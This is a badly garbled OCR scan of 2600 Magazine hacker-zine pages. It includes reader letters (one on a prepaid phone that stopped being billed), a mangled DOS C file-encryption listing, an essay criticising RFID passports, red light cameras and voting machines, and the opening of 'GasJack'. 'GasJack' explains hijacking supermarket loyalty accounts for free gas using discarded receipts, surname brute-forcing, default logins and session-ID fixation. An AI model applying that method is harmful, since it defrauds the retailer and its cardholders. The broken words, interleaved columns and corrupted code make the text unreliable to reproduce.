Pge 46 2600 Magazine
are a l i ttl e annoyi ng but, l i ke everythi ng el se, even
tual l y you l earn to i gnore them. I t took me a whol e
afternoon of cal l s to real i ze I wasn' t getti ng these
messages anymore. Curi ous, I pi nged the network
with #777 to request my account bal ance. Then I
made a few cal l s to some fri ends at thei r l and l i ne.
I pi nged the network agai n and the bal ance was the
same. Hurrah !
I n thei r desperate and haphazard effort to fi x
my phone they di sconnected i t from thei r bi l l i ng
system! My prepai d phone was now a free phone!
Al so, Ci ngul ar had no i dea who I was. The worst they
coul d do was deactivate my phone. They had no one
to send a bi l l to. Needl ess to say, I fel t more than
compensated for my hours on hol d.
I enjoyed thi s perk for ni ne months before the
phone turned on one morni ng to show " SI M card
regi strati on fai l ed. " I cal l ed tech support agai n and
after several escal ati ons and "it shoul dn' t do thi s"
quotes from the reps, my phone was reactivated,
al bei t with a $0. 01 bal ance. I ' m payi ng for phone
servi ce agai n but I wi l l fondl y remember my months
wi th a free phone.
Thi s was an i nteresti ng experi ence and i t shows
that proper phone operati on is a separate enti ty from
bi l l i ng. You can have one wi thout the other. I hope
this i s i nteresti ng to peopl e who are curi ous about
how the phone servi ce works.
ZaphO(
C
B
Dear 2600:
Thought you mi ght appreci ate the fact that not
onl y i s 2600 not hi dden at the back of the shel f i n
the Charl ottesvi l l e, Vi rgi ni a Barnes and Nobl e, but it's
al so front and center, eye l evel , and a "featured ti tl e. "
ben
Tere are many such stores all over the place
where we're proudly displayed. We tend to hear more
about the exceptions so it' important to acknowledge
when stores do a good job as most of them do.
Provocation
Dear 2600:
I had j ust purchased your magazi ne from a very
attractive femal e type uni t whi l e tal ki ng on the
phone about a comi c con. I was putti ng i t i nto my
i nsi de jacket pocket when I too was assaul ted by
your wonderful l y smel l i ng pages. Thi s resul ted i n me
sucki ng my thumb. I t hi nk my chances of hi tti ng i t
off wi th her are now l ess than zero. I thought there
were gonna be warni ngs about thi s sort of thi ng. At
any rate keep up the great work. love the smel l of a
fresh baked i ssue.
Tapi
Dear 2600:
So I was at the #2600 I RC channel chatti ng about
the Mi crosoft and Novel l partnershi p asking peopl e
what they thought about thi s. Anyhow, to make a
l ong story short I was spel l i ng Mi crosoft l i ke thi s:
mi cro$oft. I got ki cked from the channel for usi ng
bad l anguage <three ti mes resul ted i n a ban) . So my
questi on i s, when di d mi cro$oft become a bad word
on the #2 600 channel ?
ghOstbOt
We are in no way responsible for any such random
actions that occur in our I RC channel. We suspect you
were the victim of someone' opinion/joke, not to
mention your failure to realize that repeatedly doing
the same thing would get you banned. We encourage
readers to check out the #2600 channel (and other
regional 2600 channels) on the irc. 2600. net network.
Just remember that we don't control the intelligence
level. While people from the magazine try to come
onto the channel from time to time, it' mostly a wide
open space where users from all levels of the human
evolutionary scale congregate. Keep this in mind and
you won't get overly frustrated.
Appreciation
Dear 2600:
Fi rst, I need to thank you. I have thoroughl y
enjoyed your magazi ne for a few years now. I 've
l earned a ton and it's been very useful in conveyi ng
the mental i ty that so many of us share to the outsi de
worl d. Many ti mes I 've answered questi ons by si mpl y
presenti ng your magazi ne to the curi osi ty seekers.
Second, I was 1 7 when the FBI fi rst rai ded ry
home. I was 1 9 the second time around. I was 2 1
when I was sentenced i n 2005 to 1 7. 5 years i n federal
pri son. And because of my charges and what I had
admi tted to doi ng and what I was tol d to expect, that
sentence was quite a shock. No, not pedophi l i a or
even sex-rel ated. Not drug-rel ated. A mi nor rol e i n
a credi t card fraud scheme. The j udge apparentl y
was none too happy wi th me, gi vi ng me the statutory
maximum.
I woul d l ove to wri te an arti cl e for you descri bi ng
what exactl y it's l i ke to go from bad to worse to worst.
A report from the front l i nes, i f you wi l l . My hope is
that in the " unl i kel y" event that any 2600 readers are
ever charged by the feds, they won't receive five to si x
ti mes the sentence they expect, as di d I . I woul d most
l i ke to spread the word about how di rty feds can, and
wi l l , pl ay. And a few poi nts to watch out for.
let me know if you mi ght l i ke me to wri te you a
l i ttl e arti cl e. And thanks agai n guys.
Jason c.
By all means write the article. Your story serves as
a reminder to those who may not yet know it that the
prosecution will do anything - including lying to you
- in order to secure a conviction. Putting people away
is their business. While there are many overly expen
sive, incompetent, and dishonest lawyers out there,
you are still far better off getting one rather than trying
to work things out with the authorities on your own.
We've heard so many horror stories of people getting
screwed at sentencing and with today' prosecutorial
climate, it' bound to get even worse. And, needless to
say this sort of thing does nothing for rehabilitation.
Winter 2006-2007Pge 47
Continued from page 7 9
lrnd = ltable ( lrnd ) ; f * get the next lookup table value * f
ilen = ( U ) ( lrnd f 8 3 2 + 25 6 ) ; f * buffer bitlen : 2 5 6<=ilen<=1 5 1 6 * f
if ( ibit + ilen > ibuf * 8 ) { f * curr o bit-pointer+ilen spans cbuf * f
if ( ieof ) { f * EOF fag is ON * f
ilen = ibuf * 8 - ibit ; / * reset bit-length o f buffer segment * /
else { f * EOF fag lB OFF ; adjust fle pointer * f
ifn_write ( cbuf , Ibyt , ibuf , ebuf ) ; / * write data to the fle * /
lbyt - = ( ibuf - ibit f 8 ) ; f * set lbyt t o load from ibit * f
ibit % = 8 ; / * set ibit to first byte o f <new> cbuf * /
break ; f * exit loop to reload cbuf from lbyt * f
f * encrypt o r decrypt the current segment [ below] * f
for ( indx = 0 ; indx < ilen ; indx++ ) { j * loop through array elements * /
intl [ indx ] = indxi / * bit offsets from current ibit offset * /
lrnd = ltable ( lrnd ) ; f * get the next lookup table value * f
Int2 [ indx ] = lrnd ; / * lookup values for sort function * /
ifn_sort ( intl , Int2 , istk, lIen - 1 ) ; / * sort lookup array * /
memcpy ( ctmp, cbuf , 2 0 4 8 ) ; f * copy data buffer t o dest . buffer * f
i f ( iopr ) { 1* this is the encrypt operation * /
for ( indx = 0 ; indx < ilen ; indx++ ) { 1 * loop through bit group * 1
bitput ( ctmp, indx + ibit , bitget ( cbuf , intl [ indx ] + ibit ;
/ * move bits to " random" positions [ above ] * 1
else { f * this is the decrypt operation * f
for ( indx = 0 i indx < iIen; indx++ ) { / * loop through bit group * /
bitput ( ctmp , intl [ indx ] + ibit , bitget ( cbuf , indx + ibit ;
memcpy ( cbuf , ctmp,
ibit += ilen ;
if ( ibit == ibuf *
ifn_write ( cbuf ,
ibit = 0 ;
break;
/ * restore bits from " random" pos itions [ above ] * /
2 0 4 8 ) ; f * copy dest . buffer to data buffer * f
j * increment ibit to next bit-segment * /
8 ) { f * loop until ibit == length of cbuf * f
lbyt , ibuf , ebuf ) ; f * put current buf fer to fle * f
/ * set ibit t o frst byte o f <new> chuf * /
/ * ibit = = length o f chuf ; exit loop * /
free ( cbuf ) ;
free ( ctrp ) ;
free ( int1 ) ;
free ( lnt2 ) ;
free ( istk ) ;
f * deallocate the fle buffer * f
/ * deal locate the temp buffer * /
/ * deallocate the sort index array * /
f * deallocate the sort lookup array * f
/ * deallocate the sort stack array * /
bitget ( C *cstrl , I ibit ) {
I ivaI ;
switch ( ibit % 8 )
case 0 :
ivaI

l ;
break;
case 1 :
ivaI = 2 ;
break ;
case 2 :
ivaI = 4 ;
break ;
case 3 :
ivaI = 8 ;
break ;
case 4 :
ivaI = 1 6 ;
break;
case 5 :
ivaI = 32 ;
break;
case 6 :
ivaI = 64 ;
break;
case 7 :
ivaI = 12 8 ;
break;
default :
Pa
g
e 48
/* get a bit-value from a string * /
/ * initialize the bit value * /
i * switch o n bit# within character * /
f * bit #0 i n target character * f
j * value o f bit #0 * /
f * bit #1 in target character * f
/ * value of bit #1 * f
f * bit #2 in target character * f
f * value of bit #2 * f
f * bit #3 in target character * f
f * value of bit #3 * f
f * bit #4 in target character * f
/ * value of bit #4 * /
f * bit #5 in target character * f
/ * value of bit #5 * f
f * bit #6 in target character * f
/ * value of bit #6 * f
f * bit #7 in target character * f
/ * value of bit #7 * 1
2600 Ma
g
azine
V
break;
return cstr1 [ ibit I 8 ] & ival ) 1 = 0 ) ;
1 * return the value of the target bit [ above ] * 1
bitput ( C *cstrl , I ibit , I iput )
I ivaI ;
I ipos = ibit I 8 ;
switch ( ibit % 8 )
case 0 :
ivaI = 1 ;
break;
case 1 :
ivaI = 2 ;
break;
case 2 :
ivaI = 4 ;
break ;
case 3 :
ivaI = 8 ;
break;
case 4 :
ivaI = 1 6 ;
break;
case 5 :
ivaI = 3 2 ;
break;
case 6 :
ivaI = 6 4 ;
break ;
case 7 :
ivaI = 1 2 8 ;
break;
default :
break;
if ( iput ) {
if ( ! ( cstr1 [ ipos ] & ival
cstrl [ ipos ] += ivaI ;
else {
if ( cstrl [ ipos ] & ival )
cstrl [ ipos ] -= ivaI ;
1 *
1 * put a bit-value to a string * 1
1 * initialize the bit value * 1
position of 8-bit char . in cstrl * 1
1 * switch on bit# within character * 1
1 * bit #0 in target character * 1
1 * value of bit #0 * 1
1 * bit #1 in target character * 1
1 * value of bit #1 * 1
1 * bit #2 in target character * 1
1 * value of bit #2 * 1
1 * bit #3 in target character * 1
1 * value of bit #3 * 1
1 * bit #4 in target character * 1
1 * value of bit #4 * 1
1 * bit #5 in target character * 1
1
* value of bit #5 * 1
1 * bit #6 in target character * 1
1
* value of bit #6 * 1
1 * bit #7 in target character * 1
1 * value of bit #7 * 1
1
* OK to set the bit ON *
1
1 * bit is NOT already ON * 1
1 * seL bit ON by adding iva1 * 1
1 * OK to set the bit OFF * 1
1 * bit is NOT already OFF * 1
1 * set bit OFF by subt . ival * 1
V ifnsort ( I *intl , L * lnt2 , J *istk , J imax } { / * array Quicksort function * /
J iex l ; / * initialize the outer-loop exit fag * /
I iex2 ;
J ilapi
I ilsp ;
J irdx = 0 ;
J itap ;
itsp ;
I iva1 ;
L Iva2 ;
istk [ O ] = 0 ;
istk [ 1 J = imax ;
while ( irdx >= 0 )
/ *
/ *
/ * initialize the inner-loop exit fag * /
/ * initialize the low array pointer * /
/ * initialize the low stack pointer * /
/ * initialize the sort radix * /
/ * initialize the top array pointer * /
/ * initialize the top stack pointer * /
initialize array value from low stack pointer * /
initialize array value from low stack pointer * /
/ * initialize the low array pointer * 1
1
* initialize the top array pointer * 1
/ * loop until sort radix < 0 * /
ilsp = istk [ irdx + irdx ] i
itsp = istk [ irdx + irdx + 1 ] ;
irdx- - ;
/ *
/ *
/ *
set the low stack pointer * /
set the top stack pointer * /
decrement the sort radix * /
iva1 int1 [ i1sp ] ;
1va2 lnt2 [ i1sp ] ;
ilap ilsp;
itap itsp + 1
iexl 0 ;
while ( 1 iex1 )
itap- - ;
if ( itap == ilap )
iexl = 1 ;
/ *
/ *
get array value from low stack pointer * /
get array value from low stack pointer * /
/ * set the low array pointer * /
/ * set the top array pointer * /
/ * initialize the outer-loop exit fag * /
/ * loop t o sort within the radix limit * /
/ * decrement the top array pointer * /
/ * top array pointer==low array pointer * /
/ * set the outer-loop exit fag ON * /
Winter 2006-2007Pa
g
e 49
}
else if ( lva2 > lnt2 [ itap ] ) / * value @ low ptr > value @ top ptr * /
int1 [ ilap ] int1 [ itap ] ; / * swap low and top array values * /
lnt2 [ i1ap ] = lnt2 [ itap ] ; / * swap low and top array values * /
iex2 = 0 ; / * initialize the inner-loop exit fag * /
while ( l iex2 ) { / * loop to compare and swap array values * /
ilap++ ; / * increment the low array pointer * /
if ( itap = = ilap ) / * top array pointer==low array pointer * /
iex1 = 1 ; / * set the outer-loop exit fag ON * /
iex2 = 1 ; / * set the inner-loop exit fag ON * /
else if ( lva2 < lnt2 [ ilap ] ) { / * value@ low ptr<value@ low ptr * /
intI [ itap ] int1 [ ilap ] ; / * swap top and low array values * /
lnt2 [ itap ] lnt2 [ ilap ] ; / * swap top and low array values * /
iex2 = 1 ; / * set the inner-loop exit fag ON * /
intI [ ilap]
lnt2 [ ilap ]
if ( itsp -
= ivaI ;
= Iva2 ;
ilap > 1 )
/ * put array
/* put array
value from low stack pointer * /
value from low stack pointer * /
/ * low segment-width is > 1 * /
/ * increment the sort radix * /
/ * reset low array pointer * /
/ * reset top array pointer * /
irdx++
istk [ irdx +
istk [ irdx +
irdx ] ilap + 1 ;
irdx + 1 ] = itsp;
if ( itap - ilsp > 1 )
irdx++ ;
istk [ irdx + irdx ] ilsp;
istk[ irdx + irdx + 1 ] = itap - 1 ;
/ * top segment-width i s > 1 * /
/ * increment the sort radix * /
/ * reset low array pointer * /
/ * reset top array pointer * /
V ifn_msgs ( C *cms g, I iofs , I irow, I icol , I ibrp, I iext ) { / * display msgs * /
if ( iofs > = 0 ) { / * OK to clear screen * /
io_vcls ( 7 ) ; / * clear the screen * /
io_vdsp ( cmsg, 4 , abs ( iofs ) , 7 ) ;
if ( ibrp ) {
printf ( " \ a" ) ;
if ( iext ) {
io_vesr ( S , 0 , 0 ) ;
fcloseall ( ) ;
exit ( O ) ;
else {
io_vcsr( irow, iccl , 0 ) ;
L 1table ( L lrnd ) {
L 1 1 ;
L 12 ;
L 13 ;
L 14 ;
1 1 1rnd Y 8 ;
12 ( lrnd 1 1 ) Y 1 6 ;
13 ( lrnd 1 1 - 12 ) Y 6 4 ;
14 ( lrnd 1 1 - 12 - 13 ) ;
return ( 1 1 * 2 1 4 0 1 3 + 12 * 8 2 9 4 1
/ * display the user message * /
/ * OK to sound user-alert ( beep ) * /
/ * sound the user-alert * /
/ * OK t o exit the program * /
/ * relocate the cursor * /
/ * close a l l open fles * /
/ * return t o DOS * /
/ * do NOT exit the program * /
j * ' hide ' the cursor * /
/ * get next lookup table no . * /
/ * initialize temp value #1 * /
/ * initialize temp value # 2 * /
/ * initialize temp value #3 * /
/ * initialize temp value # 4 * /
/ * These 5 lines are an integer-only * /
/ * equivalent to the foating-point * /
/ * operations formerly used i n thi s , * /
/ * the 1 6 -bit DOS version o f the code * /
+ 13 * 1 7 4 0 5 + 14 * 1 0 2 1 + 2 5 3 1 0 1 1 ) Y 1 0 4 8 5 7 6 ;
V ifn_read ( C *cbuf , L 1byt , U ibuf , FILE *ebuf ) { / * read from binary fle * /
fseek ( ebuf , lbyt , SEEK_SET ) ; / * set the buffer-read pointer * /
fread V * ) cbuf , 1 , ibuf , ebuf ) ; / * read data from the binary fle * /
V ifn_write ( C *cbuf , L lbyt , U ibuf , FILE *ebuf ) { / * write to binary fle * /
fseek ( ebuf , lbyt , SEEK_SET ) ; / * set the buf fer-write pointer * /
fwrite V * ) cbuf , 1 , ibuf , ebuf ) ; / * write data to the binary fle * /
U io_vadr ( I inop ) / * get video address ( color or b/w) * /
P
g
e 50
2600 Ma
g
azine
rg . h . ah = 15 ;
int8 6 ( Ox1 0 , &rg , &rg ) ;
if ( rg . h . a1 == 7 ) {
return ( OxbOOO ) ;
else {
return ( Oxb800 ) ;
/ * video-address function * /
/ * call DOS for video address * /
/ * register A-low i s 7 * /
/ * return b/w address * /
/ * register A-low is NOT 7 * /
/ * return color address * /
V io_vcls ( I iclr )
I irow;
/ * clear screen function * /
1 * initialize the row number variable * /
/ * initialize the row data buffer * /
V
C cdat [ 8 1 ] ;
rerset ( cdat, , 8 0 ) ;
cdat [ 8 0 ] = ' \ 0 ' ;
for ( irow = 0 ; irow < 2 5 ; irow++ )
io_vdsp ( cdat , irow, 0 , iclr ) ;
io_vcsr ( I irow, I iccl , I icsr ) {
rg . h . ah 2 ;
rg . h . bh 0 ;
rg. h . dh ( C ) irow;
rg . h . dl ( C ) icol ;
int8 6 ( Ox10 , &rg, &rg ) ;
if ( icsr ) {
rg . h . ah 1 ;
rg . h . ch = ( C ) ( 1 3 - icsr ) i
rg. h . cl = 1 2 ;
int8 6 ( Ox1 0 , &rg, &rg) ;
/* clear the row data buffer * /
/ * terminate the row data buffer * /
/ * loop thru the screen rows * /
/ * display each <blank> screen row * /
/ * set cursor position [ and size ] * /
/ * cursor-position function * /
/ * video page zero * /
/ * row number * /
/ * column number * /
/ * call DOS to position cursor * /
/ * cursor-size specifed * /
/ * cursor-size function * /
/ * set cursor-begin line * /
/ * set cursor-end line * /
/ * call DOS to set cursor size * /
V io_vdsp ( C *cdat , J irow, I iccl , J iclr ) { j * display data on screen * /
I ilen = strlen ( cdat ) ; / * length of string to be displayed * /
I iptr i j * byte-counter for displayed string * /
U uclr = iclr * 2 5 6 ; /* unsigned attribute high-byte value * /
i f ( ! uvadr ) {
FP_SEG ( uvadr ) " io_vadr ( O ) ;
FP_OFF ( uvadr ) " irow * 1 6 0 + icol * 2 ;
for ( iptr " 0 ; iptr < ilen ; iptr ++ )
*uvadr " uclr + ( UC ) cdat [ iptr ] ;
uvadr++ ;
/ * video pointer segment not set * /
/ * set video pointer segment * /
/ * set video pointer offset * /
/ * loop thru displayed string * /
/ * put data to video memory * /
/ * increment video display pointer * /
'/|
. . . or new your your aSS-p(eKer.
i sn' t such a good t hi ng. Perhaps we' ve reached No shi t . And every t i me t hi s stuf is demon
a poi nt where the desi re to i ncorporate i t i nto strated, offi ci al s shrug it off as overl y paranoi d.
every aspect of our l i ves has begun t o take They don ' t understand the technol ogy, yet are
precedence over the goal of what it is we' re responsi bl e for maki ng al l of the deci si ons
tryi ng t o repl ace. I t ' s not l i ke there' s been any regardi ng i t s use.
l ack of concern over the matter, especi al l y What about the red l i ght cameras? Surel y
l atel y. Search any news aggregati ng servi ce for some enti ty besi des the capi tal i zi ng muni ci
t he terms +voting +machine +fraud and you ' l l pal i ty and associ ated pol i ce offi cers (who have
see what I ' m tal ki ng about. What about +pass- duti fu l l y acqui red extended donut breaks as
port +cracked or "red light " +camera? I ' m not a resul t of the reduced workl oad) stands to
referri ng to dri ed-out passports whose covers benefi t from them. They' ve got to be maki ng
have succumbed to ol d age, or the l i ttl e LED our streets safer, si nce that ' s the onl y ofcial
that i ndi cates your l atest burgl ary attempts have reason general l y gi ven for thei r exi stence. But
been captured on two sl owl y rotati ng reel s of even t hi s i s di sputed, as t he Washington Post
magneti c tape ( al though these are surel y prob- has di scovered upon i nvesti gati on of red l i ght
l ems to some) . I ' m tal ki ng about the excessi ve cameras i nstal l ed i n D. C. I n fact, acci dents
use of technol ogy. Fi ve years ago there was no have more than doubl ed i n some l ocati ons and
such thi ng as i ntercept i ng the communi cati ons there are even l awsui ts cl ai mi ng that mun i ci
between an i mmi grati on control computer and pal i ti es have changed l i ght t i mi ngs t o i ncrease
your passport, and ten years ago you weren' t vi ol at i ons! What i s cl ear is that acci dents
l i kel y to get an automated ti cket i n the mai l are i ncreas i ng i n many l ocati ons ( and that
because you entered an i ntersecti on behi nd there' s about $ 1 00 mi ss i ng from my checki ng
that Bi g-Ass SUV wh i ch enti rel y bl ocked your accou nt). A si mpl e sol uti on comes t o mi nd:
vi ew of t he traffi c l i ght as i t changed from green remove the damn cameras and j ust del ay the
to red. And i t ' s not l i ke thi s stuf i s hel pi ng perpendi cul ar green l i ght by a few seconds. The
anythi ng. T-bone crashes that they' re l ooki ng to prevent
The RFI D "feature" of a passport i s, as far wou l d surel y be reduced wi thout the added
as I ' m concerned, enti rel y usel ess. I t creates si de-effect of i ncreased rear-end col l i si ons. I t ' S i
an unnecessary securi ty ri sk and contri butes unfortunate that such a choi ce between safety !
noth i ng to the speed at whi ch i mmi grati on and i ncome never l eans i n our favor.
I
l i nes progress. The current system uses MI CR The grandmaster of al l fai l i ng technol ogi cal
( magnet i c i nk character recogni ti on) as the i mpl ementati ons these days seems to be the
agent swi pes the bottom porti on of your pass- voti ng mach i ne. Ah, the vot i ng machi ne. Few
port. I t ' s fast, rel ati vel y rel i abl e, perfectl y sui t- of us can even remember when the acti vi ti es of

abl e for the appl i cati on, and i t ' s even secure voti ng and usi ng a mach i ne were two enti rel y
(so l ong as the passport remai ns i n your posses- separate processes. Voti ng used to entai l ,
si on) . But we' re rapi dl y progress i ng to the poi nt marki ng your favori te candi dates onto a shee(
where anyone can sneak up behi nd you wi th a of paper to have it l ater counted by the Ki ng' s :
speci al l y desi gned RFI D reader stuffed i n thei r Men, who cou l d not be trusted. Now t he vote
crotch, brush up agai nst your tuckus, and suck counters have been repl aced wi th el aborate :
the di gi tal fi ngerpri nts and photographs of you mechani cal and el ectri cal contr, pti ons, whi ch '
P
g
e 52 2600 Ma
g
azine J
cannot be trusted. Corrupt pol l workers, l oose
gears, broken l evers, and even hangi ng chads
were no match for the commoti on sti rred up by
the poor desi gn of the modern el ectroni c voti ng
machi ne. The documentary Hacking Democ
rac
y
conveys t hi s very wel l ; you ' ve got to watch
it. Not onl y does i t demonstrate how access to
the most wi del y-handl ed component of these
machi nes can be used to skew el ecti ons, but
i t even sheds some doubt as to whether or not
the publ i c wi l l i ngl y el ected some of the l esser
evol ved members of our speci es i nto some of
the most cri ti cal posi ti ons in our soci al hi er
archy. Not that I ' m a conspi racy theori st or
anythi ng . . . .
Not everybody i s s o eager t o repl ace every
thi ng wi th the l atest and greatest gadgets,
however. Take pi l ots, for i nstance. When
pl anni ng fl i ghts, many pi l ots use an E6B (or
s i mi l ar) fl i ght computer. I t ' s a computer i n the
most r udi mentary sense of the term, essen
ti al l y a speci al -purpose sl i de rul e. I n fact, i t ' s
t he onl y fi el d i n whi ch s l i de rul es are sti l l i n
wi despread use. Why? Because they' re fast,
rel i abl e, and when you ' re thousands of feet
above the ground fl yi ng an ai rcraft you don' t
care t o be fumbl i ng wi th an el ectroni c cal cu
l ator: repl aci ng dead batteri es, tryi ng to work
around that stuck key, or wonder i ng whether or
not the LCD woul d sti l l be i ntact afer si tt i ng on
it, i f onl y you ' d started that di et a few months
ear l i er. There are other added benefits, too.
The concepts of si gni fi cant di gi ts and keepi ng
track of exponents are general l y l ost amongst
today' s TI -89-touti ng youth. Sl i de r ul es requi re
that you consi der these t hi ngs, often al l owi ng
you to catch mi stakes l ong before you wou l d
whi l e usi ng a cal cul ator.
Look, I ' m not anti -technol ogy. Real l y. I prac
ti cal l y i mmerse my enti re l i fe in i t. I t j ust seems
obvi ous that some t hi ngs aren ' t qu i te ready for
pri me ti me yet, and premature depl oyment
may actual l y have the potenti al for some devas
tat i ng consequences. The exampl es I used here
are si mpl y those that have ei ther recei ved a
bunch of press coverage or that I have personal
experi ence wi th. I threw i n the s l i de ru l e rant
for good measure ( no pun i ntended), but the
concepts they demonstrate are wel l -sui ted to
the noti on that there are some scenari os where
ol d technol ogy j ust works better. There are
pl enty more I coul d have chosen al ong the
same l i nes, some wi th more severe rami fi ca
ti ons and some whi ch are much more tri vi al .
Ei ther way, i t usual l y seems t o be t he younger
generati on who are j ust as cl osed- mi nded to
usi ng more tradi ti onal technol ogy as your
grandmother i s toward the advent of e-mai l .
Whether i t ' s endi ng up wi th a corrupt democ
racy, rampant i denti ty theft, hi gher acci dent
rates, or a broken cal cul ator when you need
that qui ck al ti tude-correcti on cal cul ati on, we
defi ni tel y need to take a good hard l ook at the
benefits and drawbacks of maki ng the swi tch to
the l atest-and-greatest.
ftMbtbl
I f you mi ssed out on ou r l atest conference (or i f you were
there and somehow managed to mi ss one of the more
than 70 ta l ks gi ven), may we suggest getti ng ahol d of our
HOPE Nu mber Si x DVDs ?
There's no way we can l i st them a l l here but if you go to
http: //store. 2600. com/hopen umbersi x. html you'l i get a
sense of what we're tal ki ng about.
We sti l l have l eftover s hi rts too. For 20 you get a HOPE
s hi rt, a conference badge, a conference progra m, and a
HOPE sti cker. Overseas add 5 for s hi ppi ng.
2600
PO Box 752
Mi ddl e I sl and, NY 1 1 953 USA
inter 2006-2007
GASJACK - HI JACKI NG
FREE GASOLI NE
by cipz
Game Over
cipz@lv2600.com Thi s arti cl e woul d be over i f the goal was as
Gi ant i s a food store chai n and some stores have si mpl e as obtai ni ng gas for free. A person of ques
gas stati ons. I t actual l y has a long and compl i cated ti onabl e ethi cal forti tude coul d eas i l y find Gi ant
hi story, none of whi ch pertai ns to t hi s hack. li ke recei pts in the garbage and then proceed to one of
many l arge food stores, they have a program whi ch many onl i ne references to have the BCN converted
offers thei r shoppers rewards for usi ng thei r Bonus- to a pri ntabl e barcode. Then j ust swi pe the barcode
Card at every purchase. Shoppers accumul ate poi nts
at the gas pump and dri ve off with di scounted gas.
whi ch are traded i n for di scounts. Al l the caveats of
But i f one objects to putti ng thei r hands i n pl aces of
havi ng your personal shoppi ng habi ts tracked appl y
questi onabl e sani tary forti tude, there exi sts another
but have nothi ng to do wi th thi s arti cl e.
method. Randoml y generati ng bar codes and then
There are several di fferent types of poi nts a
usi ng the in store scanners to see if the accounts exi st
shopper can col l ect. The ExtraRewards poi nts al l ow
and how many gas poi nts are on them i s one i dea.
shoppers to get up to a 1 5 percent di scount on
Agai n, this arti cl e woul d be over qui ckl y l eavi ng the
thei r next shoppi ng bi l l . I t i s the new GasRewards
reader the daunt i ng task of tryi ng to figure out whi ch
poi nts that has peaked my curi osity. For every one
numbers were val i d and whi ch accounts had enough
hundred dol l ars a shopper spends, they recei ve a
poi nts to make a tri p to the pump worth the efort.
di scount of ten cents of a gal l on at the gas pump.
I nternet to the Rescue
Accordi ng to Gi ant' s own pol i cy for t hi s promoti on,
Whenever I have to do somethi ng that i s bori ng
gas can be obtai ned for free i f enough poi nts are
and repeti ti ous, the fi rst thi ng I thi nk of i s how I can
earned. The pol icy however di ctates that the poi nts
get a computer to do i t for me. Even i f the ori gi nal task
can onl y be redeemed once and the di scount onl y
were t o take onl y 1 0 mi nutes, I woul d gl adl y spend
appl i es up to 30 gal l ons. Thi s means you get one
an hour wri ti ng a program to make the computer do
i t for me i n 1 0 seconds because, some day, I mi ght
fi l l of your gas tank at the earned di scount. I t has
h t t th t k I h bl h bl h bl h ave O repea e as . ear some a a a
not been confi rmed, but a fri end menti oned havi ng
about effi ci ency, but to me programmi ng i s fun ! The
a vehi cl e whi ch hol ds about 32 gal l ons of gas that
goal now was to fi nd a websi te which al l owed s hop-
was fi l l ed at the di scounted pri ce. I t appears the 30
pers to check the bal ance of thei r Gi ant BonusCards.
gal l on l i mi t mi ght not be enforced. There al so does
I l ocated several websi tes whi ch al l appear to be offi
not exi st any pol i ci es on gas cans. A scenari o: John
ci al Gi ant websi tes.
accumul ates 500 gas poi nts and deci des to cash i n
Trying to Save lime by Wasting 15 Minutes
hi s poi nts
because the deadl i ne for the promoti on
One of parti cul ar i nterest
was the si te www. gi ant-
is fast approachi ng. He proceeds to the gas pump,
food. comlbonuscardl. At fi rst gl ance I was surpri sed
swi pes hi s BonusCard under the bar code reader
to see that the fi rst three letters of the shopper' s l ast
and, voi l a, gas now fl ows at a rate of 50 cents less a
name were requi red and even more surpri sed that
gal l on. Hi s tank hol ds 30 gal l ons and he manages to
thi s system was requi ri ng 1 2 di gi ts i nstead of 1 1 to
save hi msel f 1 5 dol l ars.
l og i n. I headed over to the U. S. Census Bureau and
First Mistake
downl oaded a fi l e whi ch l i sted the most common
The Gi ant BonusCard i s nothi ng more than a
surnames i n the Uni ted States and the number of
pi ece of pl asti c wi th a UPCA barcode. The Gi ant
peopl e per surname. Usi ng a si mpl e scri pt to chop
BonusCard number (BCN) i s 1 1 di gi ts whi l e the 1 2th
the fi rst three characters off, add up the popul ati on
di gi t, a checksum, i s omi tted. The BCN i s pri nted at
numbers, and resort the l i st, I compi l ed my own new
the top of every recei pt. That was Gi ant' s fi rst mi stake.
l i st. The ori gi nal l i st contai ned over 1 6, 000 entri es.
A si mpl e sol uti on i s to adopt the practi ce of credi t The new l i s
t
contai ned l ess than 3000 entri es. Usi ng
card recei pt pri nters: onl y pri nt the l ast four di gits of pure brute forci ng, guessi ng a three character word
a card. Unfortunatel y, there are more mi stakes and has 1 7, 576 ( 2613) poss i bi l i ti es. Rather than throw
hol es whi ch make i nsti tuti ng thi s s i ngl e change i nef- my new l i st at the si te and al l ow it to brute force the
at sto

pi ng account hij acki ng. l ast name, I deci ded to try and l og i n usi ng a
Pge 54 600 Magazine
val i d set of credenti al s. After several attempts wi th "Who woul d ever want to hack thi s?" whi ch l ed to
val i d i nformati on I concl uded the l og i n functi on of the compl ete l ack of securi ty I have seen. Anyone
thi s si te was not worki ng. I j ust wasted 1 5 mi nutes, desi gni ng any onl i ne system shoul d bui l d in secu-
but oh wel l , I got a di cti onary of common surnames ri ty from day one, especi al l y i f you col l ect even a
in the U. S. I am sure that mi ght come in handy one si ngl e pi ece of i nformati on from your users. umount
day. And i n case anyone was wonderi ng, yes, Smi th Idev/soapbox
was the most common. Te Gory Detai l s
I' m In! Pl ease keep i n mi nd, I am by no means an
www. gi antpa. com was another si te whi ch l ooked expert on http or programmi ng. I taught myself what
promi si ng. Unfortunatel y i t asked for a username I needed to know i n order to get the programs to
(emai l ), password, and BCN to l og i n. I entered a work. When one vi si ts the websi te, a j SESSI ONI D i s
known val i d BCN and spoofed the rest of the i nfor- created in a cooki e. Then the l ogi n credenti al s al ong
mati on. I ran Ethereal (packet sni ffer) and Achi l l es wi th the jSESSI ONI D are sent to the server usi ng a
(proxy) and logged the data because I was sure i t POST method. The server then establ i shes a sessi on
woul d be useful l ater on. My jaw dropped as I was usi ng the j SESSI ONI D. Thi s j SESSI ONI D i s not
taken to a page whi ch l i sted the fi rst name and the checked agai nst the I P address of the cl i ent and can
savi ngs so far thi s year of the BCN owner. I noti ced be arbi trari l y speci fi ed by the cl i ent. To make thi ngs
a l i nk to check on the vari ous promoti on poi nts and easi er duri ng devel opment, I si mpl y used the BCN
fol l owed i t. True t o t he l i nk' s promi se, I was presented as the j SESSI ONI D. The server then sends back a
wi th the amount of poi nts of the several promoti ons 302 Moved Temporar i l y message. The l ocati on fi el d
whi ch the BCN owner was el i gi bl e for. Among them i n thi s message i s a ful l URL whi ch contai ns more
was the amount of GasRewards poi nts. Two more tokens and the previ ousl y menti oned j SESSI ONI D.
huge mi stakes on Gi ant' s part was al l owi ng defaul t Thi s l i nk can be fol l owed by anyone, whi ch opens up
l ogi ns and submi tti ng data i n pl ai n text. the possi bi l ity of sessi on hi j acki ng. Thi s 302 l ocati on
More Tan Just Free Gas i s retrieved usi ng a GET request and must be fol l owed
